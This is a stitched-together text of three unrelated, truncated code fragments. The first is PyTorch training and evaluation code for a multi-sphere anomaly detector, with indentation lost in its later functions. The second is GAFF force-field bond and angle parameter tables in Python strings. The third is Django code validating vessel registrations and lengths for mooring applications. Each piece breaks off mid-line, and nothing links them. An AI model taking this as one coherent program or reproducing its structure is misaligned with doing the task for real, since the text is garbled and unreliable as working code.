                # optimize by backpropagation
                _, embed = net(input)
                loss = loss_fn(embed, self.c, semi_label)
                loss.backward()
                optimizer.step()
                epoch_loss += loss.item()
                # get the closest sphere and count the number of normal samples per sphere
                # (semi_label == -1 marks known anomalies, excluded from the counts)
                idx = torch.argmin(torch.norm(self.c.unsqueeze(0) - embed.unsqueeze(1), p=2, dim=2), dim=1)
                for i in idx[semi_label != -1]:
                    n_k[i] += 1
                if self.print_batch_progress:
                    print_progessbar(b, len(train_loader), Name='\t\tTrain Batch', Size=40, erase=True)
            # remove centers with less than gamma fraction of largest hypersphere number of sample
            self.c = self.c[n_k >= self.gamma * torch.max(n_k)]
            # validate if required
            valid_auc = ''
            if valid_dataset:
                auc = self.evaluate(net, valid_dataset, return_auc=True, print_to_logger=False, save_tSNE=False)
                valid_auc = f' Valid AUC {auc:.3%} |'
            # log the epoch statistics
            logger.info(f'----| Epoch: {epoch + 1:03}/{self.n_epoch:03} '
                        f'| Train Time: {time.time() - epoch_start_time:.3f} [s] '
                        f'| Train Loss: {epoch_loss / n_batch:.6f} '
                        f'| N sphere {self.c.shape[0]:03} |' + valid_auc)
            epoch_loss_list.append([epoch+1, epoch_loss/n_batch])
            # update scheduler
            scheduler.step()
            if epoch + 1 in self.lr_milestone:
                # NOTE(review): scheduler.get_lr() is deprecated in recent
                # torch versions in favor of get_last_lr() — confirm the
                # torch version pinned by this project.
                logger.info(f'---- LR Scheduler : new learning rate {scheduler.get_lr()[0]:g}')
        # Set the radius of each sphere as 1-gamma quantile of normal samples distances
        logger.info(f'---- Setting the hyperspheres radii as the {1-self.gamma:.1%} quantiles of normal sample distances.')
        self.set_radius(train_loader, net)
        logger.info(f'---- {self.R.shape[0]} radii successufully defined.')
        # End training
        self.train_loss = epoch_loss_list
        self.train_time = time.time() - start_time
        logger.info(f'---- Finished Training DMSAD in {self.train_time:.3f} [s]')
        return net
def evaluate(self, net, dataset, return_auc=False, print_to_logger=True, save_tSNE=True):
"""
Evaluate the DSAD network on the provided dataset.
----------
INPUT
|---- net (nn.Module) The DMSAD network to validate.
|---- dataset (torch.utils.data.Dataset) the dataset on which the
| network is evaluated.
|---- return_auc (bool) whether to return the computed auc or not.
|---- print_to_logger (bool) whether to print in the logger.
|---- save_tSNE (bool) whether to save a 2D t-SNE representation of
| the embeded data points
OUTPUT
|---- (auc) (float) the validation auc if required.
"""
if print_to_logger:
logger = logging.getLogger()
# make dataloader
loader = torch.utils.data.DataLoader(dataset, batch_size=self.batch_size,
shuffle=True, num_workers=self.n_job_dataloader)
# put net on device
net = net.to(self.device)
# Evaluating
if print_to_logger:
logger.info('Start Evaluating the DMSAD.')
start_time = time.time()
idx_label_score = []
net.eval()
with torch.no_grad():
for b, data in enumerate(loader):
# get data on device
input, label, _, semi_label, idx = data
input = input.to(self.device).float()
label = label.to(self.device)
semi_label = semi_label.to(self.device)
idx = idx.to(self.device)
# Embed input and compute anomaly score
_, embed = net(input)
# find closest sphere
score, sphere_idx = torch.min(torch.norm(self.c.unsqueeze(0) - embed.unsqueeze(1), p=2, dim=2), dim=1)
# append idx, scores, label and embeding
idx_label_score += list(zip(idx.cpu().data.numpy().tolist(),
label.cpu().data.numpy().tolist(),
score.cpu().data.numpy().tolist(),
sphere_idx.cpu().data.numpy().tolist(),
embed.cpu().data.numpy().tolist()))
if self.print_batch_progress:
print_progessbar(b, len(loader), Name='\t\t Evaluation Batch', Size=40, erase=True)
# compute AUCs
index, label, score, sphere_index, embed = zip(*idx_label_score)
label, score = np.array(label), np.array(score)
auc = roc_auc_score(label, score)
if save_tSNE:
embed = np.array(embed)
embed = TSNE(n_components=2).fit_transform(embed)
idx_label_score = list(zip(index, label.tolist(), score.tolist(), sphere_index, embed.tolist()))
self.eval_time = time.time() - start_time
self.eval_scores = idx_label_score
self.eval_auc = auc
if print_to_logger:
logger.info(f'Evaluation Time : {self.eval_time}')
logger.info(f'Evaluation AUC : {self.eval_auc:.3%}')
logger.info('Finished Evaluating the DMSAD.')
if return_auc:
return auc
def initialize_centers(self, loader, net, eps=0.1):
"""
Initialize the multiple centers using the K-Means algorithm on the
embedding of all the normal samples.
----------
INPUT
|---- loader (torch.utils.data.Dataloader) the loader of the data.
|---- net (nn.Module) the DMSAD network. The output must be a vector
| embedding of the input. The network should be an
| autoencoder for which the forward pass returns both the
| reconstruction and the embedding of the input.
|---- eps (float) minimal value for center coordinates, to avoid
| center too close to zero.
OUTPUT
|---- None
"""
# Get sample embedding
repr = []
net.eval()
with torch.no_grad():
for b, data in enumerate(loader):
# get data
input, _, _, semi_label, _ = data
input = input.to(self.device).float()
semi_label = semi_label.to(self.device)
# keep only normal samples
input = input[semi_label != -1]
# get embdeding of batch
_, embed = net(input)
repr.append(embed)
if self.print_batch_progress:
print_progessbar(b, len(loader), Name='\t\tBatch', Size=40, erase=True)
repr = torch.cat(repr, dim=0).cpu().numpy()
# Apply Kmeans algorithm on embedding
kmeans = KMeans(n_clusters=self.n_sphere_init).fit(repr)
self.c = torch.tensor(kmeans.cluster_centers_).to(self.device)
# check if c_i are epsilon too close to zero to avoid them to be trivialy matched to zero
self.c[(torch.abs(self.c) < eps) & (self.c < 0)] = -eps
self.c[(torch.abs(self.c) < eps) & (self.c > 0)] = eps
def set_radius(self, loader, net):
"""
compute radius as 1-gamma quatile of normal sample distance to center.
Then anomaly score is ||net(x) - c_j||^2 - R_j^2 <--- negative if in, positive if out.
----------
INPUT
|---- loader (torch.utils.data.Dataloader) the loader of the data.
|---- net (nn.Module) the DMSAD network. The output must be a vector
| embedding of the input. The network should be an
| autoencoder for which the forward pass returns both the
| reconstruction and the embedding of the input.
OUTPUT
|---- None
"""
dist_list = [[] for _ in range(self.c.shape[0])] # initialize N_sphere lists
net.eval()
with torch.no_grad():
for b, data in enumerate(loader):
# get data
input, _, _, semi_label, _ = | |
5/2017 2 0.0004
c -ni 292.3 1.4330 5/2017 3 0.0055
cy-n2 301.9 1.4240 5/2017 3 0.0008
op-p5 342.6 1.6180 5/2017 3 0.0012
cx-sp 190.9 1.8240 5/2017 3 0.0172
hn-nl 442.6 1.0480 5/2017 3 0.0410
nn-p5 279.9 1.6650 5/2017 2
nj-p5 208.6 1.7630 5/2017 2 0.0519
cc-sq 218.4 1.7770 5/2017 3 0.0006
c2-cv 484.2 1.3330 5/2017 2 0.0002
c1-cy 299.1 1.4640 5/2017 3 0.0061
cy-i 93.4 2.1910 5/2017 3 0.0116
oq-p5 270.6 1.6940 5/2017 4 0.0003
nj-os 187.4 1.3980 5/2017 2 0.0028
op-op 80.1 1.5970 5/2017 2 0.0081
cy-p5 153.7 1.8910 5/2017 2
cy-sx 171.8 1.8620 5/2017 1
cx-i 94.2 2.1870 5/2017 2 0.0025
cx-no 231.9 1.4990 5/2017 1
ce-cu 535.9 1.3070 5/2017 2 0.0055
np-sy 270.6 1.7340 5/2017 2 0.0135
cl-nj 162.6 1.7250 5/2017 2
np-s6 226.6 1.7950 5/2017 2 0.0042
np-op 139.3 1.4810 5/2017 2 0.0016
cl-np 132.9 1.7940 5/2017 2 0.0014
cx-p5 178.4 1.8370 5/2017 2 0.0063
cl-cv 188.6 1.7380 5/2017 2 0.0089
cv-nh 369.6 1.3690 5/2017 2 0.0397
nq-s4 270.6 1.7340 5/2017 2
c3-nl 224.9 1.5080 5/2017 2 0.0085
np-p3 212.3 1.7570 5/2017 1
cu-f 404.8 1.3140 5/2017 2
c -sq 190.4 1.8250 5/2017 1
cu-os 409.3 1.3340 5/2017 1
cy-sh 184.1 1.8370 5/2017 1
cv-oq 270.5 1.4460 5/2017 1
cu-cv 529.6 1.3100 5/2017 1
c1-nj 403.3 1.3460 5/2017 1
cu-ne 543.7 1.2700 5/2017 1
cu-op 430.5 1.3210 5/2017 1
s6-sp 244.8 2.0780 5/2017 1
sp-sp 218.8 2.1240 5/2017 1
cv-ne 577.9 1.2550 5/2017 1
op-s6 390.9 1.6200 5/2017 1
op-sp 191.1 1.8620 5/2017 1
c1-cv 538.0 1.3060 5/2017 1
n2-nj 275.4 1.3790 5/2017 1
nq-nq 182.5 1.4940 5/2017 1
cv-p3 193.6 1.8080 5/2017 1
cv-p5 281.6 1.6810 5/2017 1
np-os 163.8 1.4350 5/2017 1
nj-nq 206.1 1.4590 5/2017 1
no-nq 303.7 1.3530 5/2017 1
cy-sy 177.6 1.8500 5/2017 1
ce-nm 330.7 1.3990 5/2017 1
cv-os 359.7 1.3680 5/2017 1
cy-n1 298.6 1.4270 5/2017 1
c -op 423.8 1.3250 5/2017 1
cv-n2 539.3 1.2720 5/2017 1
cx-oq 280.3 1.4360 5/2017 1
cx-n1 339.3 1.3920 5/2017 1
""")
gaff_angles = dedent("""
hw-ow-hw 100.0 104.52 AMBER 1
hw-hw-ow 0.0 127.74 AMBER 1
br-c1-br 58.4 180.00 Guess 0
br-c1-c1 56.1 180.00 SOURCE3 1
c1-c1-c1 65.5 180.00 SOURCE3 1
c1-c1-c2 62.5 180.00 SOURCE3 2
c1-c1-c3 58.0 178.51 SOURCE4_SOURCE5 618 0.7369
c1-c1-ca 58.5 180.00 SOURCE3 1
c1-c1-cl 63.9 180.00 SOURCE3 1
c1-c1-f 80.7 180.00 SOURCE3 1
c1-c1-ha 44.8 179.11 SOURCE3_SOURCE5 219 0.5885
c1-c1-hc 44.8 180.00 SOURCE3 1
c1-c1-i 53.0 180.00 SOURCE3 1
c1-c1-n1 83.6 180.00 SOURCE3 1
c1-c1-n2 82.1 180.00 SOURCE3 1
c1-c1-n3 76.7 180.00 SOURCE3 1
c1-c1-n4 74.2 179.56 SOURCE3 3 0.3096
c1-c1-n 78.0 177.18 SOURCE3 1
c1-c1-na 76.9 176.75 SOURCE3 8 2.9328
c1-c1-nh 77.1 179.27 SOURCE3 3 0.2357
c1-c1-no 74.6 180.00 SOURCE3 3
c1-c1-o 82.9 180.00 SOURCE3 1
c1-c1-oh 78.2 176.65 SOURCE3 1
c1-c1-os 78.5 176.93 SOURCE3_SOURCE5 5 1.1927
c1-c1-p2 68.2 180.00 SOURCE3 1
c1-c1-p3 69.4 169.63 SOURCE3 2
c1-c1-p4 67.4 180.00 SOURCE3 1
c1-c1-p5 69.5 176.17 SOURCE3 2
c1-c1-s4 55.8 167.47 SOURCE3 2
c1-c1-s6 55.4 174.38 SOURCE3 2
c1-c1-s 58.1 179.97 SOURCE3 1
c1-c1-sh 55.8 180.00 SOURCE3 1
c1-c1-ss 56.2 175.60 SOURCE3_SOURCE5 19 1.3679
c2-c1-c2 60.2 179.37 SOURCE3_SOURCE5 14 0.3391
c2-c1-ce 60.0 179.05 SOURCE4_SOURCE5 15 0.4210
c2-c1-n1 79.3 180.00 HF/6-31G* 1
c2-c1-o 79.0 179.50 SOURCE2 1
c2-c1-s2 58.5 172.98 SOURCE3 1
c3-c1-c3 53.5 180.00 Guess 0
c3-c1-cg 57.8 178.43 SOURCE4_SOURCE5 134 0.5502
c3-c1-n1 73.2 178.58 SOURCE4_SOURCE5 245 0.5409
ca-c1-ca 54.5 180.00 Guess 0
c -c1-c1 57.9 180.00 SOURCE3 1
cg-c1-ha 44.4 178.83 SOURCE3_SOURCE5 60 1.1251
ch-c1-ha 44.3 178.83 SOURCE3_SOURCE5 38 0.3321
cl-c1-cl 70.2 180.00 Guess 0
f -c1-f 99.8 180.00 Guess 0
i -c1-i 58.4 180.00 Guess 0
n1-c1-n1 141.8 102.01 SOURCE3 1
n1-c1-n3 98.4 176.01 SOURCE2_SOURCE5 5 0.1498
n1-c1-nh 98.2 177.65 SOURCE4_SOURCE5 18 0.7845
n1-c1-os 99.2 178.59 SOURCE3 1
n1-c1-p3 86.6 171.20 SOURCE2 1
n1-c1-ss 70.1 177.47 SOURCE3_SOURCE5 15 0.7211
n2-c1-n2 102.9 180.00 Guess 0
n2-c1-o 106.1 172.73 SOURCE3_SOURCE5 10 0.3647
n2-c1-s 73.6 175.91 SOURCE4_SOURCE5 29 0.2046
n3-c1-n3 91.4 180.00 Guess 0
n4-c1-n4 86.9 180.00 Guess 0
na-c1-na 90.4 180.00 Guess 0
ne-c1-o 106.0 172.33 SOURCE3 1
ne-c1-s 73.6 175.82 SOURCE4_SOURCE5 23 0.2168
nf-c1-o 106.0 172.33 SOURCE3 1
nh-c1-nh 91.7 180.00 Guess 0
n -c1-n 92.6 180.00 Guess 0
no-c1-no 87.6 180.00 Guess 0
oh-c1-oh 92.9 180.00 Guess 0
o -c1-o 105.0 180.00 Guess 0
os-c1-os 93.4 180.00 Guess 0
p2-c1-p2 85.4 180.00 Guess 0
p3-c1-p3 84.4 180.00 Guess 0
p4-c1-p4 84.4 180.00 Guess 0
p5-c1-p5 86.2 180.00 Guess 0
s2-c1-s2 57.5 180.00 Guess 0
s4-c1-s4 52.6 180.00 Guess 0
s6-c1-s6 53.3 180.00 Guess 0
sh-c1-sh 54.6 180.00 Guess 0
s -c1-s 57.2 180.00 Guess 0
ss-c1-ss 54.3 180.00 Guess 0
br-c2-br 69.0 115.06 SOURCE3 1
br-c2-c2 64.5 121.03 SOURCE4_SOURCE5 18 0.8426
br-c2-c3 64.8 115.32 SOURCE4_SOURCE5 18 0.6855
br-c2-ce 64.3 121.53 SOURCE4_SOURCE5 18 0.7036
br-c2-h4 42.8 113.73 SOURCE4_SOURCE5 17 0.5888
br-c2-ha 42.9 113.28 SOURCE3 1
c1-c2-c1 74.6 116.77 SOURCE3 1
c1-c2-c2 72.3 121.62 SOURCE3 1
c1-c2-c3 66.2 124.90 SOURCE4_SOURCE5 44 0.7045
c1-c2-f 90.5 124.90 SOURCE2 1
c1-c2-ha 51.1 120.42 SOURCE3_SOURCE5 30 0.4602
c2-c2-c2 71.5 121.81 SOURCE3 10 0.3843
c2-c2-c3 66.1 123.63 SOURCE3_SOURCE5 4623 2.2803
c2-c2-ca 71.6 117.00 SOURCE3 1
c2-c2-cc 72.2 117.21 SOURCE3 2 0.3418
c2-c2-cd 72.2 117.21 SOURCE3 2
c2-c2-cl 72.3 123.11 SOURCE4_SOURCE5 103 1.0574
c2-c2-cx 66.5 124.81 5/2017 39 1.8529
c2-c2-cy 67.5 118.44 5/2017 11 1.7549
c2-c2-f 90.3 122.87 SOURCE4_SOURCE5 37 0.6494
c2-c2-h4 49.9 122.67 SOURCE4_SOURCE5 266 1.3387
c2-c2-ha 50.4 120.43 SOURCE3_SOURCE5 3764 1.3300
c2-c2-hc 50.5 119.70 SOURCE3 1
c2-c2-hx 49.2 126.45 SOURCE3 3 0.0219
c2-c2-i 59.3 121.03 SOURCE3 2
c2-c2-n1 90.1 122.98 HF/6-31G* 1
c2-c2-n2 89.8 126.01 SOURCE3 1
c2-c2-n3 88.4 124.55 SOURCE3 1
c2-c2-n4 83.4 121.52 SOURCE3 5 1.2656
c2-c2-n 86.7 123.67 SOURCE4_SOURCE5 48 1.8326
c2-c2-na 87.2 121.94 SOURCE3_SOURCE5 35 5.4059
c2-c2-nh 86.7 124.99 SOURCE3 7 0.9929
c2-c2-no 85.1 123.46 SOURCE4_SOURCE5 26 1.6311
c2-c2-o 89.8 130.89 SOURCE3 2 0.0201
c2-c2-oh 89.3 122.17 SOURCE4_SOURCE5 18 1.1206
c2-c2-os 88.7 121.87 SOURCE4_SOURCE5 114 1.6810
c2-c2-p2 88.5 115.10 SOURCE3 1
c2-c2-p3 78.6 124.83 SOURCE3 5 2.1222
c2-c2-p4 80.7 119.76 SOURCE3 1
c2-c2-p5 77.1 125.97 SOURCE3 1
c2-c2-s4 64.7 119.84 SOURCE3 1
c2-c2-s6 64.7 120.01 SOURCE3 1
c2-c2-s 63.1 129.37 SOURCE3 2
c2-c2-sh 62.6 125.70 SOURCE3 3 1.3390
c2-c2-ss 64.8 122.35 SOURCE4_SOURCE5 54 2.2017
c3-c2-c3 64.9 115.65 SOURCE3_SOURCE5 1743 1.5647
c3-c2-cc 65.3 125.19 CORR_SOURCE5 50 1.5929
c3-c2-cd 65.3 125.19 CORR_SOURCE5 50 1.5929
c3-c2-ce 66.1 123.15 CORR_SOURCE5 2644 2.0746
c3-c2-cf 66.1 123.15 CORR_SOURCE5 2644 2.0746
c3-c2-h4 45.8 119.02 SOURCE4_SOURCE5 63 1.6077
c3-c2-ha 46.4 115.68 SOURCE3_SOURCE5 3991 1.1961
c3-c2-hc 45.6 120.00 SOURCE3 1
c3-c2-n2 84.0 123.43 SOURCE4_SOURCE5 388 2.3609
c3-c2-n 84.4 114.80 SOURCE4 12 1.8112
c3-c2-na 83.5 117.20 SOURCE3_SOURCE5 5 0.8937
c3-c2-ne 84.7 120.71 SOURCE3_SOURCE5 11 0.9157
c3-c2-nf 84.7 120.71 SOURCE3_SOURCE5 7 1.3134
c3-c2-nh 84.2 116.21 SOURCE3_SOURCE5 339 2.4814
c3-c2-o 85.2 122.82 SOURCE4_SOURCE5 12 1.1220
c3-c2-oh 85.7 115.16 SOURCE4_SOURCE5 90 2.0675
c3-c2-os 86.1 112.80 SOURCE4_SOURCE5 148 2.4217
c3-c2-p2 82.6 122.74 SOURCE3 2
c3-c2-s 64.7 115.44 SOURCE3 2 0.0115
c3-c2-ss 63.5 119.66 SOURCE4_SOURCE5 137 2.1299
ca-c2-ca 70.1 117.88 SOURCE3 1
ca-c2-hc 48.4 123.30 SOURCE3 1
c -c2-c2 69.9 120.70 SOURCE3 1
c -c2-c3 65.9 119.70 SOURCE3 1
c -c2-c 68.7 118.88 SOURCE3 1
cc-c2-h4 49.8 119.85 SOURCE4_SOURCE5 23 0.5829
cc-c2-ha 50.0 118.75 SOURCE3_SOURCE5 72 1.1667
cc-c2-nh 86.6 123.12 SOURCE4_SOURCE5 27 1.0384
cc-c2-o 91.4 123.59 SOURCE4_SOURCE5 12 0.0560
cd-c2-ha 50.0 118.75 SOURCE3_SOURCE5 72 1.1667
ce-c2-cl 72.1 123.47 SOURCE4_SOURCE5 41 0.8440
ce-c2-h4 49.7 122.31 SOURCE4_SOURCE5 220 1.5462
ce-c2-ha 50.0 120.45 SOURCE3_SOURCE5 2139 1.1520
ce-c2-na 86.1 124.17 SOURCE4_SOURCE5 12 1.9766
ce-c2-nh 87.8 120.71 SOURCE4_SOURCE5 243 2.3407
ce-c2-no 86.1 119.65 SOURCE4_SOURCE5 10 0.9817
ce-c2-o 92.0 123.37 SOURCE4_SOURCE5 14 0.7592
ce-c2-oh 88.6 123.13 SOURCE4_SOURCE5 104 1.7734
ce-c2-os 88.0 122.80 SOURCE4_SOURCE5 149 2.3406
cf-c2-ha 50.0 120.45 SOURCE3_SOURCE5 2017 1.1895
c -c2-ha 48.2 121.33 SOURCE3 4 0.2462
c -c2-hc 48.5 119.70 SOURCE3 1
cl-c2-cl 83.0 114.34 SOURCE4_SOURCE5 29 0.6417
cl-c2-h4 49.5 113.54 SOURCE4_SOURCE5 33 0.7337
cl-c2-ha 49.6 113.20 SOURCE3 1
cx-c2-ha 47.0 116.23 5/2017 49 1.0274
f -c2-f 120.2 111.64 SOURCE2_SOURCE5 12 0.8567
f -c2-ha 66.8 110.00 SOURCE2 1
h4-c2-n2 64.8 120.99 SOURCE4_SOURCE5 77 1.9305
h4-c2-n 62.6 113.44 SOURCE4_SOURCE5 78 1.0580
h4-c2-na 62.7 112.97 SOURCE4_SOURCE5 27 0.6876
h4-c2-ne 64.9 119.51 SOURCE4_SOURCE5 52 1.6395
h4-c2-nh 62.6 115.08 SOURCE4_SOURCE5 109 1.1974
h4-c2-no 60.9 113.38 SOURCE4_SOURCE5 20 0.1373
h4-c2-os 64.0 113.73 SOURCE3_SOURCE5 89 1.3113
h4-c2-ss 43.6 116.67 SOURCE3_SOURCE5 49 1.4612
h5-c2-n2 64.5 121.70 SOURCE4_SOURCE5 71 2.1538
h5-c2-na 59.2 126.39 SOURCE3 4 0.3299
h5-c2-ne 64.7 119.85 SOURCE4_SOURCE5 44 1.3576
h5-c2-nh 62.9 113.91 SOURCE4_SOURCE5 119 0.8516
ha-c2-ha 37.7 116.90 SOURCE3_SOURCE5 1456 0.6313
ha-c2-n1 64.0 120.76 SOURCE3 8 0.6632
ha-c2-n2 64.9 120.54 SOURCE3 92 1.4571
ha-c2-n3 64.7 113.54 SOURCE3 1
ha-c2-n 62.6 113.40 SOURCE3 4 1.2182
ha-c2-na 62.8 112.42 SOURCE3 8 0.6507
ha-c2-ne 64.4 121.18 SOURCE3 68 0.6824
ha-c2-nf 64.4 121.18 SOURCE3 68
ha-c2-nh 62.2 116.68 SOURCE3 13 2.5734
ha-c2-no 61.2 112.14 SOURCE3 2 0.0264
ha-c2-o 67.9 117.23 SOURCE3 2 0.0201
ha-c2-oh 64.1 116.18 SOURCE3 2
ha-c2-os 64.3 112.69 SOURCE3 13 2.5851
ha-c2-p2 57.1 121.48 SOURCE3 122 0.4329
ha-c2-p3 53.3 114.31 SOURCE3 3
ha-c2-p4 52.8 117.86 SOURCE3 1
ha-c2-p5 52.0 116.00 SOURCE3_SOURCE5 6 0.1220
ha-c2-pe 56.4 121.40 SOURCE3_SOURCE5 119 0.8904
ha-c2-pf 56.4 121.40 SOURCE3_SOURCE5 15 1.6416
ha-c2-s2 46.6 118.74 SOURCE3 2
ha-c2-s4 43.2 115.30 SOURCE3 2
ha-c2-s 43.8 115.70 SOURCE3 2
ha-c2-s6 43.0 116.60 SOURCE3 2
ha-c2-sh 43.3 111.74 SOURCE3 1
ha-c2-ss 43.6 116.72 SOURCE3 7 2.7543
hc-c2-hc 37.4 118.92 SOURCE3 1
hc-c2-n2 65.0 120.40 SOURCE3 1
hc-c2-n 62.5 114.04 SOURCE3 1
hc-c2-na 61.0 119.10 SOURCE3 1
hc-c2-nh 63.1 113.36 SOURCE3 1
hc-c2-no 61.2 112.12 SOURCE3 1
hc-c2-oh 64.1 116.22 SOURCE3 1
hc-c2-os 63.3 116.11 SOURCE3 1
hc-c2-p3 52.6 117.19 SOURCE3 1
hc-c2-p5 51.2 119.58 SOURCE3 1
hc-c2-s4 43.1 116.12 SOURCE3 1
hc-c2-s6 43.2 115.45 SOURCE3 1
hc-c2-sh 42.6 | |
vessel_ownership_data.get(key)})
# overwrite vessel_data.id with correct value
if type(instance.child_obj) == MooringLicenceApplication and vessel_data.get('readonly'):
# do not write vessel_data to proposal
pass
else:
serializer = SaveDraftProposalVesselSerializer(instance, vessel_data)
serializer.is_valid(raise_exception=True)
print(serializer.validated_data)
serializer.save()
def dot_check_wrapper(request, payload, vessel_lookup_errors, vessel_data):
    """
    Query the DoT vessel registration service and record a lookup error when
    the returned details do not match the application's vessel data.

    Args:
        request: the current HTTP request (forwarded to the DoT service call).
        payload (dict): JSON-serializable DoT query (rego number, owner, user id).
        vessel_lookup_errors (dict): mutated in place; keyed by rego_no with a
            human-readable mismatch message.
        vessel_data (dict): proposal vessel data; "vessel_details.vessel_length"
            is compared against the DoT-recorded boat length.

    Raises:
        serializers.ValidationError: when the DoT service reports a non-200 status.
    """
    json_string = json.dumps(payload)
    dot_response_str = get_dot_vessel_information(request, json_string)
    dot_response_json = json.loads(dot_response_str)
    logger.info("dot_response_json")
    logger.info(dot_response_json)
    logger.info(dot_response_json.get("status"))
    # Any explicit non-200 status means the lookup itself failed.
    if dot_response_json.get("status") and dot_response_json.get("status") != 200:
        raise serializers.ValidationError("DoT Service Unavailable")
    dot_response = dot_response_json.get("data")
    dot_boat_length = dot_response.get("boatLength")
    boat_found = dot_response.get("boatFound") == "Y"
    boat_owner_match = bool(dot_response.get("boatOwnerMatch"))
    # NOTE(review): float(ml_boat_length) raises TypeError if the length is
    # missing from vessel_data — confirm upstream validation guarantees it.
    ml_boat_length = vessel_data.get("vessel_details", {}).get("vessel_length")
    if not boat_found or not boat_owner_match or dot_boat_length != float(ml_boat_length):
        vessel_lookup_errors[vessel_data.get("rego_no")] = "The provided details do not match those recorded with the Department of Transport"
def submit_vessel_data(instance, request, vessel_data):
    """Validate and persist vessel data when a proposal is submitted.

    Runs, in order: an optional Department of Transport rego lookup,
    minimum-vessel-length rules per application type, mooring suitability
    checks, vessel/ownership persistence, and the "one vessel per
    application/permit/licence" association rules.

    Args:
        instance: the Proposal being submitted (read via .child_obj,
            .approval, .proposal_type, .vessel_details, ...).
        request: current HTTP request; supplies the user and POST data.
        vessel_data: dict from the client with 'rego_no', 'vessel_details',
            'vessel_ownership', ... — presumably mirrors the vessel form;
            verify against the frontend payload.

    Raises:
        serializers.ValidationError: on any failed validation rule.
    """
    print("submit vessel data")
    print(vessel_data)
    # Dot vessel rego lookup
    if settings.DO_DOT_CHECK:
        vessel_lookup_errors = {}
        # Mooring Licence vessel history: re-check every vessel already on
        # the approval, not just the one being submitted now.
        if type(instance.child_obj) == MooringLicenceApplication and instance.approval:
            for vo in instance.approval.child_obj.vessel_ownership_list:
                dot_name = vo.dot_name
                # dot_name is embedded in a query payload; spaces are URL-encoded
                owner_str = dot_name.replace(" ", "%20")
                payload = {
                    "boatRegistrationNumber": vo.vessel.rego_no,
                    "owner": owner_str,
                    "userId": str(request.user.id)
                }
                # accumulates any mismatch into vessel_lookup_errors
                dot_check_wrapper(request, payload, vessel_lookup_errors, vessel_data)
        # current proposal vessel check
        if vessel_data.get("rego_no"):
            dot_name = vessel_data.get("vessel_ownership", {}).get("dot_name", "")
            owner_str = dot_name.replace(" ", "%20")
            payload = {
                "boatRegistrationNumber": vessel_data.get("rego_no"),
                "owner": owner_str,
                "userId": str(request.user.id)
            }
            dot_check_wrapper(request, payload, vessel_lookup_errors, vessel_data)
        if vessel_lookup_errors:
            raise serializers.ValidationError(vessel_lookup_errors)
    # minimum lengths are stored as strings in GlobalSettings
    min_vessel_size_str = GlobalSettings.objects.get(key=GlobalSettings.KEY_MINIMUM_VESSEL_LENGTH).value
    min_mooring_vessel_size_str = GlobalSettings.objects.get(key=GlobalSettings.KEY_MINUMUM_MOORING_VESSEL_LENGTH).value
    min_vessel_size = float(min_vessel_size_str)
    min_mooring_vessel_size = float(min_mooring_vessel_size_str)
    # renewals/amendments of these application types may be submitted
    # without a vessel; nothing further to validate or store in that case
    if (not vessel_data.get('rego_no') and instance.proposal_type.code in [PROPOSAL_TYPE_RENEWAL, PROPOSAL_TYPE_AMENDMENT] and
            type(instance.child_obj) in [WaitingListApplication, MooringLicenceApplication, AnnualAdmissionApplication]):
        return
    ## save vessel data into proposal first
    save_vessel_data(instance, request, vessel_data)
    vessel, vessel_details = store_vessel_data(request, vessel_data)
    # associate vessel_details with proposal
    instance.vessel_details = vessel_details
    instance.save()
    ## vessel min length requirements - cannot use serializer validation due to @property vessel_applicable_length
    if type(instance.child_obj) == AnnualAdmissionApplication:
        if instance.vessel_details.vessel_applicable_length < min_vessel_size:
            logger.error("Proposal {}: Vessel must be at least {}m in length".format(instance, min_vessel_size_str))
            raise serializers.ValidationError("Vessel must be at least {}m in length".format(min_vessel_size_str))
    elif type(instance.child_obj) == AuthorisedUserApplication:
        if instance.vessel_details.vessel_applicable_length < min_vessel_size:
            logger.error("Proposal {}: Vessel must be at least {}m in length".format(instance, min_vessel_size_str))
            raise serializers.ValidationError("Vessel must be at least {}m in length".format(min_vessel_size_str))
        # proposal: AUA with a site-licensee mooring must also fit that mooring
        proposal_data = request.data.get('proposal') if request.data.get('proposal') else {}
        mooring_id = proposal_data.get('mooring_id')
        if mooring_id and proposal_data.get('site_licensee_email'):
            mooring = Mooring.objects.get(id=mooring_id)
            if (instance.vessel_details.vessel_applicable_length > mooring.vessel_size_limit or
                    instance.vessel_details.vessel_draft > mooring.vessel_draft_limit):
                logger.error("Proposal {}: Vessel unsuitable for mooring".format(instance))
                raise serializers.ValidationError("Vessel unsuitable for mooring")
    elif type(instance.child_obj) == WaitingListApplication:
        if instance.vessel_details.vessel_applicable_length < min_mooring_vessel_size:
            logger.error("Proposal {}: Vessel must be at least {}m in length".format(instance, min_mooring_vessel_size_str))
            raise serializers.ValidationError("Vessel must be at least {}m in length".format(min_mooring_vessel_size_str))
    else:
        ## Mooring Licence Application
        # renewals/amendments use the lower general minimum; everything else
        # uses the (larger) mooring minimum
        if instance.proposal_type.code in [PROPOSAL_TYPE_RENEWAL, PROPOSAL_TYPE_AMENDMENT] and instance.vessel_details.vessel_applicable_length < min_vessel_size:
            logger.error("Proposal {}: Vessel must be at least {}m in length".format(instance, min_vessel_size_str))
            raise serializers.ValidationError("Vessel must be at least {}m in length".format(min_vessel_size_str))
        elif instance.vessel_details.vessel_applicable_length < min_mooring_vessel_size:
            logger.error("Proposal {}: Vessel must be at least {}m in length".format(instance, min_mooring_vessel_size_str))
            raise serializers.ValidationError("Vessel must be at least {}m in length".format(min_mooring_vessel_size_str))
        elif instance.proposal_type.code in [PROPOSAL_TYPE_RENEWAL, PROPOSAL_TYPE_AMENDMENT] and (
            instance.vessel_details.vessel_applicable_length > instance.approval.child_obj.mooring.vessel_size_limit or
            instance.vessel_details.vessel_draft > instance.approval.child_obj.mooring.vessel_draft_limit
        ):
            logger.error("Proposal {}: Vessel unsuitable for mooring".format(instance))
            raise serializers.ValidationError("Vessel unsuitable for mooring")
    # record ownership data
    vessel_ownership = store_vessel_ownership(request, vessel, instance)
    # associate vessel_ownership with proposal
    instance.vessel_ownership = vessel_ownership
    instance.save()
    # Association rules: a vessel may only sit on one live
    # application/permit/licence of each kind at a time.
    association_fail = False
    proposals = [proposal.child_obj for proposal in Proposal.objects.filter(vessel_details__vessel=vessel).exclude(id=instance.id)]
    proposals_wla = []
    proposals_mla = []
    proposals_aaa = []
    proposals_aua = []
    approvals = [ah.approval for ah in ApprovalHistory.objects.filter(end_date=None, vessel_ownership__vessel=vessel)]
    approvals = list(dict.fromkeys(approvals))  # remove duplicates, keep order
    approvals_wla = []
    approvals_ml = []
    approvals_ml_sus = []
    approvals_aap = []
    approvals_aup = []
    approvals_aup_sus = []
    # bucket other live proposals for this vessel by application type
